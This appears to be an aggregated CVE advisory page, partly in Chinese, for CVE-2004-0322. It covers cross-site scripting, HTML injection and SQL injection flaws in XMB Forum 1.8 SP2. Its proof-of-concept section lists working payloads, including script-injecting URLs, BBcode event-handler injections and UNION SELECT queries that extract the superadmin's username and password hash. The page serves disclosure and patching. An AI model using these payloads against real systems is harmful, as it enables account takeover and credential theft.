CVE-2004-0322
CVSS4.3
发布时间 :2004-02-23 00:00:00
修订时间 :2016-10-17 22:43:49
NMCOES    

[原文]Multiple cross-site scripting (XSS) vulnerabilities in XMB 1.8 Final SP2 allow remote attackers to execute arbitrary script as other users via the (1) member parameter in member.php, (2) uid parameter in u2uadmin.php, (3) user parameter in editprofile.php, (4) an onmouseover event in an align tag when bbcode is allowed, or (5) img tag where bbcode is allowed.


[CNNVD]XMB Forum多个输入验证漏洞(CNNVD-200402-089)

        XMB 1.8最终版SP2存在多个跨站脚本(XSS)漏洞。远程攻击者可以像其他用户样借助(1) member.php中的member参数,(2)u2uadmin.php中的uid参数,(3)editprofile.php中的user参数, (4)bbcode被允许时align标签的onmouseover事件,或者(5)bbcode被允许时img标签执行任意脚本。

- CVSS (基础分值)

CVSS分值: 4.3 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:xmb_forum:xmb:1.8_sp1
cpe:/a:xmb_forum:xmb:1.8
cpe:/a:xmb_forum:xmb:1.8_sp2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0322
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0322
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200402-089
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/bugtraq/2004-02/0645.html
(UNKNOWN)  BUGTRAQ  20040225 Re: [waraxe-2004-SA#004] - Multiple vulnerabilities in XMB 1.8 Partagium Final SP2
http://marc.info/?l=bugtraq&m=107756526625179&w=2
(UNKNOWN)  BUGTRAQ  20040223 [waraxe-2004-SA#004] - Multiple vulnerabilities in XMB 1.8 Partagium Final SP2
http://www.securityfocus.com/bid/9726
(VENDOR_ADVISORY)  BID  9726
http://www.xmbforum.com/community/boards/viewthread.php?tid=746859
(UNKNOWN)  CONFIRM  http://www.xmbforum.com/community/boards/viewthread.php?tid=746859
http://xforce.iss.net/xforce/xfdb/15292
(VENDOR_ADVISORY)  XF  xmb-multiple-scripts-xss(15292)
http://xforce.iss.net/xforce/xfdb/15294
(UNKNOWN)  XF  xmb-bbcode-execute-code(15294)

- 漏洞信息

XMB Forum多个输入验证漏洞
中危 跨站脚本
2004-02-23 00:00:00 2005-10-20 00:00:00
远程  
        XMB 1.8最终版SP2存在多个跨站脚本(XSS)漏洞。远程攻击者可以像其他用户样借助(1) member.php中的member参数,(2)u2uadmin.php中的uid参数,(3)editprofile.php中的user参数, (4)bbcode被允许时align标签的onmouseover事件,或者(5)bbcode被允许时img标签执行任意脚本。

- 公告与补丁

        The vendor has released XMB 1.8 SP3 to address these issues.
        XMB Forum 1.8
        
        XMB Forum 1.8 SP2
        
        XMB Forum 1.8 SP1
        

- 漏洞信息 (23745)

XMB Forum 1.8 u2uadmin.php uid Parameter XSS (EDBID:23745)
php webapps
2004-02-23 Verified
0 Janek Vind
N/A [点击下载]
source: http://www.securityfocus.com/bid/9726/info

XMB Forum has been reported prone to multiple cross-site scripting, HTML injection and SQL injection vulnerabilities. The issues present themselves due to insufficient sanitization of remote user supplied data. An attacker may exploit any one of these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user or to have malicious SQL queries executed in the underlying database.

http://www.example.com/xmb18sp2/u2uadmin.php?uid=x"><%73cript>alert(document.cookie);</%73cript>		

- 漏洞信息 (23746)

XMB Forum 1.8 editprofile.php user Parameter XSS (EDBID:23746)
php webapps
2004-02-23 Verified
0 Janek Vind
N/A [点击下载]
source: http://www.securityfocus.com/bid/9726/info
 
XMB Forum has been reported prone to multiple cross-site scripting, HTML injection and SQL injection vulnerabilities. The issues present themselves due to insufficient sanitization of remote user supplied data. An attacker may exploit any one of these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user or to have malicious SQL queries executed in the underlying database.

http://www.example.com/xmb18sp2/editprofile.php?user=x"><%73cript>alert(document.cookie);</%73cript>		

- 漏洞信息 (23747)

XMB Forum 1.8 BBcode align Tag XSS (EDBID:23747)
php webapps
2004-02-23 Verified
0 Janek Vind
N/A [点击下载]
source: http://www.securityfocus.com/bid/9726/info
 
XMB Forum has been reported prone to multiple cross-site scripting, HTML injection and SQL injection vulnerabilities. The issues present themselves due to insufficient sanitization of remote user supplied data. An attacker may exploit any one of these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user or to have malicious SQL queries executed in the underlying database.

text1 [align=center onmouseover=alert(document.cookie);] text2 [/align]		

- 漏洞信息

4041
XMB header.php Encoded Request XSS Filter Bypass
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public Vendor Disputed

- 漏洞描述

- 时间线

2004-02-25 Unknow
2004-02-24 Unknow

- 解决方案

Upgrade to version 1.8 SP3 or 1.9 Nexus BETA or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

XMB Forum Multiple Input Validation Vulnerabilities
Input Validation Error 9726
Yes No
2004-02-23 12:00:00 2009-07-12 03:06:00
Discovery of these vulnerabilities has been credited to Janek Vind <come2waraxe@yahoo.com>.

- 受影响的程序版本

XMB Forum 1.8 SP2
XMB Forum 1.8 SP1
XMB Forum 1.8
XMB Forum 1.8 SP3

- 不受影响的程序版本

XMB Forum 1.8 SP3

- 漏洞讨论

XMB Forum has been reported prone to multiple cross-site scripting, HTML injection and SQL injection vulnerabilities. The issues present themselves due to insufficient sanitization of remote user supplied data. An attacker may exploit any one of these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user or to have malicious SQL queries executed in the underlying database.

- 漏洞利用

The following proof of concept has been supplied:

Cross-Site Scripting:
http://www.example.com/xmb18sp2/forumdisplay.php?fid=1&amp;foobar=&lt;%73cript&gt;
http://www.example.com/xmb18sp2/member.php?action=viewpro&amp;member=x&lt;%73cript&gt;alert(document.cookie);&lt;/%73cript&gt;
http://www.example.com/xmb18sp2/u2uadmin.php?uid=x"&gt;&lt;%73cript&gt;alert(document.cookie);&lt;/%73cript&gt;
http://www.example.com/xmb18sp2/editprofile.php?user=x"&gt;&lt;%73cript&gt;alert(document.cookie);&lt;/%73cript&gt;

HTML Injection:
text1 [align=center onmouseover=alert(document.cookie);] text2 [/align]
text1 [img=1x1]javascript:alert(document.cookie);//gif[/img] text2

SQL Injection:
http://www.example.com/xmb18sp2/viewthread.php?tid=1&amp;ppp=x
http://www.example.com/xmb18sp2/misc.php?action=list&amp;order=postnum&amp;desc=x
http://www.example.com/xmb18sp2/forumdisplay.php?fid=1&amp;tpp=x
http://www.example.com/xmb18sp2/forumdisplay.php?fid=1&amp;ascdesc=x
http://www.example.com/xmb18sp2/stats.php?action=view&amp;addon=x

Getting username for superadmin:
http://www.example.com/xmb18sp2/stats.php?action=view&amp;addon=WHERE t.tid&lt;0 UNION ALL SELECT NULL,NULL,username FROM xmb_members WHERE uid=1 LIMIT 1/*

Getting password's md5 hash for superadmin:
http://www.example.com/xmb18sp2/stats.php?action=view&amp;addon=WHERE t.tid&lt;0 UNION ALL SELECT NULL,NULL,password FROM xmb_members WHERE uid=1 LIMIT 1/*

- 解决方案

The vendor has released XMB 1.8 SP3 to address these issues.


XMB Forum 1.8

XMB Forum 1.8 SP2

XMB Forum 1.8 SP1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站